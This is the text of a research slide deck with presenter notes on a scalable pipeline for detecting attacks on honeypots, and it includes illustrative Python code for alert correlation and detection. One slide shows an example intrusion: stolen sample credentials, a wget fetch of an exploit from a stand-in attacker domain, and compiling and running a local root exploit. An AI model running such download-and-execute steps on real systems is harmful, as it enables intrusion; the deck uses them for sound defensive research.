Date post: 26-Jul-2020
Page 1: Scalable Data Analytics Pipeline for Real-Time Attack ...publish.illinois.edu/science-of-security-lablet/files/2015/09/10062015-Eric-Badger...Pipeline Design Pipeline Deployment Validation

Scalable Data Analytics Pipeline for Real-Time Attack Detection; Design, Validation, and Deployment in a Honeypot Environment

Eric Badger
Master’s Student
Computer Engineering

1


Overview
▪ Introduction/Motivation
▪ Challenges
▪ Pipeline Design
▪ Pipeline Deployment
▪ Validation of Alerts and Attack Detection Tools
▪ Future Work
▪ Conclusion

2

Presenter
Presentation Notes
The main focus of this talk is the practical challenges.

Research Problem
Our goal is to detect potential attacks as early as possible. Security analysts attempt to detect and prevent attacks, but they can’t analyze everything in their infrastructure by hand. They need tools that automate the analysis for early detection of attacks.
▪ How do we transition attack detection models from theory to practice?
▪ How do we validate that the alerts we are using are useful?
  Does combining alerts from different monitors make attack detection better?
  Is the extra performance overhead worth it?
▪ How do we validate that our attack detection model is adequate and better than others?
  What models are suitable for real-time attack detection in practical deployment?

3

Presenter
Presentation Notes
Don’t spend too much time

Research Challenges: Transitioning Attack Detection from Theory to Practice

▪ Identifying which alerts are useful for attack detection
▪ Normalizing all logs to a common format
▪ Achieving both high-accuracy and real-time attack detection
▪ Achieving high-accuracy attack detection in the face of alert randomness, noise, and imperfect monitors
▪ Scaling the data pipeline

[Figure: The chain of tools used for data-driven attack detection]

4

Presenter
Presentation Notes
To achieve the transition from theory to practice, these are the challenges we must overcome

Example Attack Scenario

[Diagram: Attacker, Legitimate Users, and a Target System with Firewall, OpenSSH, Bro IDS, File Integrity Monitor, and Syslog components]

Credentials obtained via password guessing, email phishing, or social engineering:
  alice:password123
  bob:password456
  …

1. Login remotely
  sshd: Accepted <user> from <remote>
2. OS fingerprinting
  $ uname -a; w
  Linux 2.6.xx, up 1:17, 1 user
  USER TTY LOGIN@ IDLE
  xxx console 18:40 1:16
3. Download exploit
  $ wget server6.bad-domain.com/vm.c
  Connecting to xx.yy.zz.tt:80… connected.
  HTTP 1.1 GET /vm.c 200 OK
4. Escalate privilege
  $ gcc vm.c -o a; ./a
  Linux vmsplice Local Root Exploit
  [+] mmap: 0xAABBCCDD
  [+] page: 0xDDEEFFGG
  …
  # whoami
  root
5. Replace SSH daemon
  sshd: Received SIGHUP; restarting.

5

Presenter
Presentation Notes
“Let me show you an attack scenario that illustrates the difficulty of the problem. Here is an example of a credential-stealing attack at NCSA.” “Looking at the events in isolation may not be sufficient to detect an attack; we need to correlate them.” “Now that we have gone through the example, how do we actually detect this attack?” Don’t spend too much time here.
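The notes above stress that single events look harmless and only their correlation reveals the attack. As a minimal sketch, assuming alerts are already normalized into (timestamp, user, alert) tuples, the Python below groups alerts per user and counts how many stages of the example scenario occur in order. The stage labels and the threshold are hypothetical, chosen to mirror the five steps on the slide; this is not AttackTagger's method.

```python
from collections import defaultdict

# Hypothetical alert labels for the five stages of the example scenario.
ATTACK_STAGES = [
    "login_remote",
    "os_fingerprint",
    "download_exploit",
    "privilege_escalation",
    "replace_sshd",
]

def stages_matched(events, stages=ATTACK_STAGES):
    """Count how many stages appear in order (starting from the first stage)
    in one user's time-ordered events; unrelated events may be interleaved."""
    matched = 0
    for _, alert in events:
        if matched < len(stages) and alert == stages[matched]:
            matched += 1
    return matched

def correlate(alerts, threshold=3):
    """Group (timestamp, user, alert) tuples by user and flag users whose
    ordered events cover at least `threshold` stages of the scenario."""
    per_user = defaultdict(list)
    for ts, user, alert in alerts:
        per_user[user].append((ts, alert))
    flagged = {}
    for user, events in per_user.items():
        events.sort()  # order each user's events by timestamp
        n = stages_matched(events)
        if n >= threshold:
            flagged[user] = n
    return flagged
```

For example, a user who logs in, fingerprints the OS, downloads an exploit, and escalates privileges matches four stages and is flagged, while a user who only logs in is not.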

How to Extract Important Alerts
▪ Network Monitors
  Bro: network IDS used for packet analysis
  CriticalStack Intel Feed
▪ Host Monitors
  OSSEC: runs periodic system checks and file integrity monitoring; aggregates and correlates all other host alerts
  Snoopy Logger: logs all execv system calls
  RKHunter: searches for rootkits, hidden folders/files/ports, and other system issues
  Syslogs: normal GNU/Linux “/var/log” logs, such as auth.log, kern.log, dpkg.log, and others
  Bash Logs: logs Bash history as the commands are executed

6

Presenter
Presentation Notes
Bro was created at UC Berkeley and co-developed by NCSA.

Log Normalization and Aggregation

[Figure: sample OSSEC, RKHunter, auth, Snoopy, and Bro notice logs, with timestamps in different formats such as epoch time and ISO 8601]

7

Presenter
Presentation Notes
“Before I introduce the pipeline, let me introduce some key components. One of these components is log normalization. This shows the problem of needing to normalize heterogeneous logs.”
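The slide contrasts epoch timestamps with ISO 8601. A minimal sketch of that part of normalization, assuming Bro-style epoch seconds and classic syslog stamps (which carry neither a year nor a time zone), converts both to ISO 8601. Treating syslog times as UTC and passing the year explicitly are assumptions; a real deployment would use each host's configured time zone.

```python
from datetime import datetime, timezone

def epoch_to_iso8601(epoch_seconds: float) -> str:
    """Convert a Unix epoch timestamp (as in Bro logs) to ISO 8601 in UTC."""
    return datetime.fromtimestamp(epoch_seconds, tz=timezone.utc).isoformat()

def syslog_to_iso8601(stamp: str, year: int) -> str:
    """Convert a classic syslog stamp such as 'Oct  6 18:40:01' to ISO 8601.
    The stamp omits the year and zone, so the year is supplied by the caller
    and the time is ASSUMED to be UTC."""
    parsed = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
    return parsed.replace(tzinfo=timezone.utc).isoformat()
```

Once every source is converted this way, alerts from different monitors can be ordered on one timeline.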

Log Normalization and Aggregation (2)
▪ Since the logs are all in different formats, they need to be normalized to a common format

[Figure: Normalized Log]

  All logs need to be centralized so that we can act on them
  TLS/SSL encryption is necessary to secure the movement of logs through the pipeline
  If not, logs could be added, deleted, or changed by a man-in-the-middle (MITM) attack

8

Presenter
Presentation Notes
“Log aggregation is collecting all of the logs in a centralized location.” Normalized log fields: timestamp, IP:user, alert, user state, attack state, received timestamp.
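The notes list the fields of the normalized log. One way to pin that format down is a small record type. The sketch below is hypothetical: the field names are our own spelling of the fields in the notes, the example state values are illustrative, and JSON is assumed as the wire format.

```python
import json
from dataclasses import asdict, dataclass

@dataclass
class NormalizedAlert:
    """One alert in the common format (hypothetical field names that follow
    the field list in the presenter notes)."""
    timestamp: str           # when the event happened (ISO 8601)
    ip_user: str             # "IP:user" pair identifying the actor
    alert: str               # alert label produced by a monitor
    user_state: str          # illustrative values: "benign", "suspicious", ...
    attack_state: str        # attack stage, if known
    received_timestamp: str  # when the pipeline received the alert (ISO 8601)

    def to_json(self) -> str:
        """Serialize with sorted keys so identical alerts give identical JSON."""
        return json.dumps(asdict(self), sort_keys=True)
```

Keeping both the event time and the received time makes it possible to measure how long alerts take to travel through the pipeline.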

Pipeline Design

[Diagram: Generic Tools: Data Source | Example Tools: Honeypots]

● The Data Source can be any sort of online or offline computer or device
  ○ Online
    ■ Honeypots, servers, workstations, phones
  ○ Offline
    ■ Security testbed, old logs
● We use customized honeypots deployed at the NCSA

9

Presenter
Presentation Notes
Be precise about what the data sources should be

Pipeline Design

[Diagram: Generic Tools: Data Source → Monitors | Example Tools: Honeypots → (network traffic/raw logs) → Bro]

● The Monitors take in data and create alerts
● The data can be logs, network traffic, or anything that can be alerted on
● We use Bro, OSSEC, Snoopy Logger, RKHunter, Syslogs, and Bash logs

10


Pipeline Design

[Diagram: Generic Tools: Data Source → Monitors → Log Aggregation and Normalization | Example Tools: Honeypots → (network traffic/raw logs) → Bro → (alerts)]

● The Log Aggregation and Normalization stage takes in alerts from multiple inputs and normalizes them to a common format
● We use Logstash as the log aggregation tool
● We use Logstash filters to do the log normalization
● Logstash integrates with many other tools and has a large community

11
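The slide says normalization is done with Logstash filters. Logstash itself would typically use grok patterns for this; the Python sketch below only illustrates the idea, under the assumption that each source gets its own parser and every parser emits the same keys. The regular expressions are simplified, and the Snoopy pattern assumes an older message layout (`[uid:... ]: command`) that may differ between Snoopy versions.

```python
import re
from typing import Callable, Dict, Optional

# Simplified, hypothetical patterns for two sources.
AUTH_ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
SNOOPY_EXEC = re.compile(r"snoopy\[\d+\]: \[uid:(?P<uid>\d+)[^\]]*\]: (?P<cmd>.+)$")

def parse_auth(line: str) -> Optional[dict]:
    """Map an sshd 'Accepted ...' line to the common keys."""
    m = AUTH_ACCEPTED.search(line)
    if not m:
        return None
    return {"source": "auth", "alert": "ssh_login_accepted",
            "user": m["user"], "ip": m["ip"], "detail": m["method"]}

def parse_snoopy(line: str) -> Optional[dict]:
    """Map a Snoopy command-execution line to the same common keys."""
    m = SNOOPY_EXEC.search(line)
    if not m:
        return None
    return {"source": "snoopy", "alert": "command_executed",
            "user": "uid:" + m["uid"], "ip": None, "detail": m["cmd"]}

PARSERS: Dict[str, Callable[[str], Optional[dict]]] = {
    "auth": parse_auth,
    "snoopy": parse_snoopy,
}

def normalize(source: str, line: str) -> Optional[dict]:
    """Dispatch a raw line to its source's parser; unknown sources yield None."""
    parser = PARSERS.get(source)
    return parser(line) if parser else None
```

Because every parser returns the same five keys, downstream stages never need to know which monitor produced an alert.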


Pipeline Design

[Diagram: Generic Tools: Data Source → Monitors → Log Aggregation and Normalization → Message Queue | Example Tools: Honeypots → (network traffic/raw logs) → Bro → (alerts)]

● The Message Queue absorbs fluctuations in the throughput of alerts
● This prevents alert loss
● We use Kafka because it is horizontally scalable and high-throughput

12

Presenter
Presentation Notes
Talk about how we have 2 divergent pathways. Explain “horizontally scalable”
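“Horizontally scalable” means throughput grows by adding machines rather than buying a bigger one. Kafka achieves this by splitting a topic into partitions that can live on different brokers and be read by different consumers. The sketch below models that idea: keyed messages map to a fixed partition (so alerts from one host stay in order), and partitions are spread round-robin over a consumer group. It uses `zlib.crc32` as a stand-in hash; Kafka's default Java partitioner uses murmur2, so actual partition numbers will differ.

```python
import zlib
from collections import defaultdict

def partition_for(key: str, num_partitions: int) -> int:
    """Map a message key (e.g. a honeypot host name) to a partition.
    crc32 is a stand-in for Kafka's murmur2-based default partitioner."""
    return zlib.crc32(key.encode("utf-8")) % num_partitions

def assign_partitions(num_partitions: int, consumers: list) -> dict:
    """Spread partitions round-robin across the consumers of one group."""
    assignment = defaultdict(list)
    for p in range(num_partitions):
        assignment[consumers[p % len(consumers)]].append(p)
    return dict(assignment)
```

With six partitions, going from two to three consumers cuts each consumer's share from three partitions to two without changing where any host's alerts are written.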

Pipeline Design

[Diagram: Generic Tools: Data Source → Monitors → Log Aggregation and Normalization → Message Queue → Attack Detection | Example Tools: Honeypots → (network traffic/raw logs) → Bro → (alerts) … → AttackTagger]

● The Attack Detection tool takes in alerts from the Message Queue and analyzes them to detect attacks
● We use AttackTagger, an attack detection tool based on factor graphs

13

Presenter
Presentation Notes
Emphasize that this is a custom tool built in the DEPEND group “If I have time, we may talk more about this tool later”
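AttackTagger is described as factor-graph based. To illustrate what inference on such a model looks like, the sketch below runs max-product (Viterbi) inference on a simple chain factor graph: one hidden user state per event, a factor linking each event to its state, and a factor linking consecutive states. The three states and all factor values are hypothetical and do not come from AttackTagger or the papers cited in this talk.

```python
import math

STATES = ["benign", "suspicious", "malicious"]

# Hypothetical unary factors: compatibility of an observed event with a state.
EVENT_FACTOR = {
    "login_remote":         {"benign": 0.8,  "suspicious": 0.15, "malicious": 0.05},
    "os_fingerprint":       {"benign": 0.3,  "suspicious": 0.5,  "malicious": 0.2},
    "download_exploit":     {"benign": 0.05, "suspicious": 0.45, "malicious": 0.5},
    "privilege_escalation": {"benign": 0.01, "suspicious": 0.19, "malicious": 0.8},
}
# Hypothetical pairwise factors: compatibility of consecutive user states.
TRANSITION_FACTOR = {
    "benign":     {"benign": 0.8,  "suspicious": 0.18, "malicious": 0.02},
    "suspicious": {"benign": 0.2,  "suspicious": 0.6,  "malicious": 0.2},
    "malicious":  {"benign": 0.01, "suspicious": 0.09, "malicious": 0.9},
}

def map_states(events):
    """Max-product (Viterbi) inference on a chain factor graph: return the
    highest-scoring sequence of user states for the observed events."""
    if not events:
        return []
    # score[s]: best log-score of any state path ending in state s so far.
    score = {s: math.log(EVENT_FACTOR[events[0]][s]) for s in STATES}
    backpointers = []
    for event in events[1:]:
        new_score, pointer = {}, {}
        for s in STATES:
            prev = max(STATES, key=lambda p: score[p] + math.log(TRANSITION_FACTOR[p][s]))
            new_score[s] = (score[prev] + math.log(TRANSITION_FACTOR[prev][s])
                            + math.log(EVENT_FACTOR[event][s]))
            pointer[s] = prev
        score = new_score
        backpointers.append(pointer)
    # Trace back from the best final state.
    path = [max(STATES, key=lambda s: score[s])]
    for pointer in reversed(backpointers):
        path.append(pointer[path[-1]])
    return list(reversed(path))
```

With these made-up factors, the login, fingerprint, download, escalate sequence from the example scenario decodes to benign, suspicious, malicious, malicious.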

Pipeline Design

[Diagram: Generic Tools: Data Source → Monitors → Log Aggregation and Normalization → Message Queue → Attack Detection, Log Storage | Example Tools: Honeypots → (network traffic/raw logs) → Bro → (alerts) … → AttackTagger]

● The Log Storage tool stores logs for post-mortem analysis
● We chose Elasticsearch because it integrates easily with Logstash and has low indexing times

14
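For post-mortem analysis, an analyst typically pulls every alert tied to one source address over the time span of an incident. A sketch of such a request body in Elasticsearch's Query DSL (a `bool` query with `term` and `range` filters, sorted by time) follows. The field names are assumptions: `@timestamp` is the field Logstash adds by default, and `ip` is assumed to be mapped as a `keyword` or `ip` field so that an exact `term` match works.

```python
def postmortem_query(ip: str, start: str, end: str) -> dict:
    """Build a Query DSL body that finds every alert for one source IP
    within [start, end], oldest first. Field names are assumptions."""
    return {
        "query": {
            "bool": {
                # Filters match exactly and skip relevance scoring.
                "filter": [
                    {"term": {"ip": ip}},
                    {"range": {"@timestamp": {"gte": start, "lte": end}}},
                ]
            }
        },
        "sort": [{"@timestamp": {"order": "asc"}}],
    }
```

The returned dictionary would be sent as the body of a `_search` request against the index that holds the alerts.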


Pipeline Design

[Diagram: Generic Tools: Data Source → Monitors → Log Aggregation and Normalization → Message Queue → Attack Detection, Log Storage, Data Visualization | Example Tools: Honeypots → (network traffic/raw logs) → Bro → (alerts) … → AttackTagger]

● The Data Visualization tool lets system administrators see large amounts of data in a concise space
● We chose Kibana because it has comprehensive visualization features and integrates well with Elasticsearch

15
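Much of what a Kibana dashboard shows is aggregation: many raw alerts collapsed into a few buckets. A minimal sketch of a per-hour, per-alert-type count (the same idea as a date-histogram bar chart) follows. The input shape of (ISO 8601 timestamp, alert) pairs is an assumption, and in practice Elasticsearch would compute this aggregation server-side.

```python
from collections import Counter
from datetime import datetime

def alerts_per_hour(alerts):
    """Bucket (ISO 8601 timestamp, alert) pairs into hourly counts per alert
    type, similar to what a date-histogram visualization summarizes."""
    buckets = Counter()
    for ts, alert in alerts:
        # Truncate each timestamp to the start of its hour.
        hour = datetime.fromisoformat(ts).replace(minute=0, second=0, microsecond=0)
        buckets[(hour.isoformat(), alert)] += 1
    return dict(sorted(buckets.items()))
```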


16

Presenter
Presentation Notes
In AttackTagger, we can log SSH IPs from across the world.

Pipeline Design

[Diagram: complete pipeline. Generic Tools: Data Source → Monitors → Log Aggregation and Normalization → Message Queue → Attack Detection, Log Storage, Data Visualization | Example Tools: Honeypots → (network traffic/raw logs) → Bro → (alerts) … → AttackTagger]

17

Presenter
Presentation Notes
“I’m showing you this because I built this.” Explain that much effort went into creating it.
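The full diagram can be summarized as a flow with two pathways out of the message queue: one to storage, one to detection. The toy, single-process sketch below mirrors that shape with a standard-library `queue.Queue` standing in for Kafka; `normalize` and `detect` are placeholder callables for the Logstash filters and the detector, not real interfaces of either tool.

```python
import queue

def run_pipeline(raw_lines, normalize, detect):
    """Toy model of the pipeline: normalized alerts pass through a queue,
    then fan out to storage and to attack detection."""
    q = queue.Queue()
    for line in raw_lines:            # monitors -> aggregation/normalization
        alert = normalize(line)
        if alert is not None:
            q.put(alert)              # message queue buffers alerts
    storage, detections = [], []
    while not q.empty():
        alert = q.get()
        storage.append(alert)         # pathway 1: log storage
        result = detect(alert)        # pathway 2: attack detection
        if result:
            detections.append(result)
    return storage, detections
```

In the real deployment the two pathways are separate consumers reading the same Kafka data, so a slow detector does not hold back storage.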

How Do I Know What Alerts Are Important?
▪ Research in [1] and [2] studied attacks over a six-year period at NCSA. This research identified important alerts related to these attacks and developed the AttackTagger detection tool
▪ We used and extended a custom set of monitors to create alerts corresponding to the inputs used in AttackTagger
▪ In essence, we brought AttackTagger from a theoretical tool to actual deployment

[1] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014. Preemptive intrusion detection. HotSoS '14.
[2] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15.

18

Presenter
Presentation Notes
“I showed you the pipeline that is data-driven, but how do I determine what data to use?” “This is a lot of intellectual work”

What Can We Do with This Pipeline?
▪ Both online and offline deployment
▪ Online
  Analysis of attacks happening on the infrastructure
  Analysis of attack detection tools on live data
▪ Offline
  Post-mortem log analysis (via Elasticsearch/Kibana)
  Analysis of old attacks
  Development of attack detection tools
  Validation of alerts

19

Presenter
Presentation Notes
“I’ve talked about creating the pipeline, but what can I actually do with it?”

Honeypots at NCSA
▪ NCSA server running several VMs
  Honeypot VMs
    Open to public
  Monitoring VM
    Allows TCP port 5000 (Logstash) from honeypots
    Allows TCP port 22 from NCSA, UI, and UI wireless
    Sends logs to Collector via private network
▪ Collector
  Allows TCP port 5001 (Logstash) from private network
  Allows TCP port 22 from NCSA, UI, and UI wireless

[Diagram: Honeypot VMs, Monitoring VM, and External Collector, connected over a Public Network and a Private Network]

20

Presenter
Presentation Notes
Focus on how the honeypots are secure/low-risk. The practical challenge is making honeypots secure and low-risk.
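The access rules on the slide can be written down as data and checked mechanically, which makes it easy to confirm that, for example, a compromised honeypot cannot reach the collector directly. The sketch below assumes a default-deny policy (anything not listed is blocked), which the slide implies but does not state; zone names such as `ui_wireless` are hypothetical labels for the networks named on the slide.

```python
# Allowed inbound (host, port, source zone) triples, taken from the slide.
ALLOWED = {
    ("monitoring_vm", 5000, "honeypots"),        # Logstash input
    ("monitoring_vm", 22, "ncsa"),
    ("monitoring_vm", 22, "ui"),
    ("monitoring_vm", 22, "ui_wireless"),
    ("collector", 5001, "private_network"),      # Logstash input
    ("collector", 22, "ncsa"),
    ("collector", 22, "ui"),
    ("collector", 22, "ui_wireless"),
}

def is_allowed(host: str, port: int, source_zone: str) -> bool:
    """ASSUMED default-deny check: only listed connections are permitted,
    except that honeypot VMs are deliberately open to the public."""
    if host == "honeypot":
        return True
    return (host, port, source_zone) in ALLOWED
```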

Honeypots at NCSA (2)

21

Presenter
Presentation Notes
Don’t spend much time here

Preliminary Honeypot Results
▪ Three separate SSH brute-force attacks successfully compromised one of the honeypots in the first three days
▪ The attackers appeared to download and execute either an open proxy or a DDoS attack via the program “/tmp/squid64”
▪ They beat my monitors! (Well, sort of...)
  They pushed their malware from the anomalous host instead of pulling it from the honeypot
  They deleted the malware immediately after running it, so OSSEC’s file-integrity monitoring did not see it

22

Presenter
Presentation Notes
We got calls about a machine launching rogue SSH brute-force attacks. SLOW DOWN on this slide. This slide is very interesting and important.
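All three compromises started with SSH brute force, a stage that appears in auth.log before any malware runs. A minimal sliding-window detector for that stage is sketched below, assuming (epoch seconds, auth.log message) pairs as input and OpenSSH's usual “Failed password for … from …” wording. The threshold of more than five failures in 60 seconds is a hypothetical setting, not one used on the NCSA honeypots.

```python
import re
from collections import defaultdict, deque

FAILED = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

def bruteforce_sources(events, max_failures=5, window_seconds=60):
    """Flag source IPs with more than `max_failures` failed SSH logins inside
    any sliding window of `window_seconds` (hypothetical thresholds)."""
    recent = defaultdict(deque)  # ip -> timestamps of recent failures
    flagged = set()
    for ts, message in sorted(events):
        m = FAILED.search(message)
        if not m:
            continue
        window = recent[m["ip"]]
        window.append(ts)
        # Drop failures that fell out of the window.
        while window and ts - window[0] > window_seconds:
            window.popleft()
        if len(window) > max_failures:
            flagged.add(m["ip"])
    return flagged
```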

How to Validate Importance of Inputs (Alerts)
▪ Mix and match which monitors/alerts we use in our attack detection
▪ Evaluate the difference in attack detection coverage and accuracy
  Adding monitors/alerts will likely add detection coverage because of extra data
  Adding monitors/alerts could decrease detection accuracy because of additional noise
▪ Determine whether the difference in detection coverage is worth the additional overhead

23

Presenter
Presentation Notes
Relate this to the pipeline. Don’t overtalk.
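The mix-and-match evaluation can be made concrete by scoring every subset of monitors against labeled incidents. The sketch below is hypothetical: it treats an incident as detected whenever any chosen monitor alerted on it, which ignores how a real detector weighs alerts, and it reports coverage (share of attacks detected) and precision (share of alerted incidents that were attacks) as a stand-in for accuracy.

```python
from itertools import combinations

def evaluate_subsets(monitors, incidents):
    """Score every non-empty subset of monitors.
    `incidents` is a list of (is_attack, set_of_monitors_that_alerted).
    Simplifying assumption: an incident counts as alerted for a subset if
    any monitor in that subset raised an alert for it."""
    attacks = [alerted for is_attack, alerted in incidents if is_attack]
    results = {}
    for k in range(1, len(monitors) + 1):
        for subset in combinations(monitors, k):
            chosen = set(subset)
            detected = sum(1 for alerted in attacks if alerted & chosen)
            flagged = [is_attack for is_attack, alerted in incidents if alerted & chosen]
            coverage = detected / len(attacks) if attacks else 0.0
            precision = sum(flagged) / len(flagged) if flagged else 0.0
            results[subset] = (coverage, precision)
    return results
```

On toy data where Snoopy alerts on one attack and one benign incident, adding Snoopy to Bro and OSSEC leaves coverage unchanged but lowers precision, which is the coverage-versus-noise trade-off described on the slide.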

How to Validate Accuracy of Outputs (Detection Tools)
▪ Compare and contrast different attack detection tools
  e.g. Factor Graphs, Bayesian Networks, Markov Random Fields, Signature Detection, etc.
  Which are most accurate?
  Which are least complex?
▪ In the pipeline, attack detection tools are plug and play as long as they can read the normalized alert format
  If they can’t, a translation filter can be added

24

Presenter
Presentation Notes
Relate this to the pipeline
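“Plug and play” amounts to every detector sharing one interface over the normalized alert format, with an adapter for tools that expect something else. A minimal sketch of that arrangement follows; `SignatureDetector`, `LegacyTupleDetector`, and `TranslationFilter` are hypothetical names used only for illustration.

```python
from typing import Callable, Dict, List, Protocol

class Detector(Protocol):
    """Any detector that consumes alerts in the normalized format."""
    def process(self, alert: dict) -> bool: ...

class SignatureDetector:
    """Toy signature detector that reads the normalized format directly."""
    def __init__(self, signatures):
        self.signatures = set(signatures)

    def process(self, alert: dict) -> bool:
        return alert["alert"] in self.signatures

class LegacyTupleDetector:
    """Hypothetical tool that expects (user, event) tuples instead."""
    def check(self, record) -> bool:
        _user, event = record
        return event == "privilege_escalation"

class TranslationFilter:
    """Adapter: translates normalized alerts into the legacy tool's input."""
    def __init__(self, legacy: LegacyTupleDetector, translate: Callable[[dict], tuple]):
        self.legacy = legacy
        self.translate = translate

    def process(self, alert: dict) -> bool:
        return self.legacy.check(self.translate(alert))

def run_detectors(detectors: Dict[str, Detector], alerts: List[dict]) -> Dict[str, List[bool]]:
    """Feed the same alert stream to every plugged-in detector."""
    return {name: [d.process(a) for a in alerts] for name, d in detectors.items()}
```

Because the pipeline only ever calls `process`, swapping in a Bayesian-network or Markov-random-field detector would not require changes upstream.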

Future Work
▪ Validate data pipeline inputs (alerts) and outputs (attack detection tools)
▪ Add additional data types to the data pipeline
  Netflows
  Full file-integrity monitoring (e.g. Tripwire)
  Administrator-generated alerts/profiles
  Keystroke data (e.g. iSSHD)
▪ Convert the detection model into a stream-processing system
  Detectors such as AttackTagger are currently batch-processing detectors
  We need to process the data in real time
▪ Transition the entire pipeline into practice on the NCSA production system

25
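The difference between batch and stream processing is whether the model re-reads a batch of past alerts or updates its state as each alert arrives. A minimal sketch of the streaming style, assuming a hidden-Markov-style model with made-up parameters, keeps one belief per user and applies the forward-filtering update (predict, then correct) on every alert. This illustrates the technique only; it is not a description of how AttackTagger is or will be implemented.

```python
# Hypothetical parameters for illustration; not taken from AttackTagger.
STATES = ("benign", "suspicious", "malicious")
INITIAL = {"benign": 0.9, "suspicious": 0.09, "malicious": 0.01}
TRANSITION = {
    "benign":     {"benign": 0.8,  "suspicious": 0.18, "malicious": 0.02},
    "suspicious": {"benign": 0.2,  "suspicious": 0.6,  "malicious": 0.2},
    "malicious":  {"benign": 0.01, "suspicious": 0.09, "malicious": 0.9},
}
LIKELIHOOD = {
    "login_remote":         {"benign": 0.8,  "suspicious": 0.15, "malicious": 0.05},
    "os_fingerprint":       {"benign": 0.3,  "suspicious": 0.5,  "malicious": 0.2},
    "download_exploit":     {"benign": 0.05, "suspicious": 0.45, "malicious": 0.5},
    "privilege_escalation": {"benign": 0.01, "suspicious": 0.19, "malicious": 0.8},
}

class StreamingDetector:
    """Keeps one belief per user and updates it as each alert arrives
    (forward filtering), so past alerts never have to be re-processed."""

    def __init__(self, threshold: float = 0.5):
        self.threshold = threshold
        self.belief = {}  # user -> {state: probability}

    def update(self, user: str, event: str) -> bool:
        prior = self.belief.get(user, INITIAL)
        # Predict: push the previous belief through the transition model.
        predicted = {s: sum(prior[p] * TRANSITION[p][s] for p in STATES) for s in STATES}
        # Correct: weight each state by how well it explains the new event.
        unnormalized = {s: predicted[s] * LIKELIHOOD[event][s] for s in STATES}
        total = sum(unnormalized.values())
        self.belief[user] = {s: v / total for s, v in unnormalized.items()}
        return self.belief[user]["malicious"] >= self.threshold
```

With these parameters, alice's malicious probability first crosses 0.5 on the privilege-escalation alert, at which point `update` returns True.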


Conclusion
▪ Showed how to transition attack detection software from theory to practice
▪ Showed how to evaluate the effectiveness of the inputs (alerts) and outputs (attack detection tools) of the pipeline
▪ Identified challenges and how to overcome them

26


Special Thanks
▪ Phuong Cao
▪ Alex Withers
▪ Adam Slagell
▪ NCSA
▪ DEPEND Research Group

27


Questions?

28


Citations
[1] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014. Preemptive intrusion detection. In Proceedings of the 2014 Symposium and Bootcamp on the Science of Security (HotSoS '14). ACM, New York, NY, USA, Article 21, 2 pages. DOI: 10.1145/2600176.2600197. http://doi.acm.org/10.1145/2600176.2600197

[2] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real-world measurements. In Proceedings of the 2015 Symposium and Bootcamp on the Science of Security (HotSoS '15). ACM, New York, NY, USA, Article 5, 12 pages. DOI: 10.1145/2746194.2746199. http://doi.acm.org/10.1145/2746194.2746199

29


30

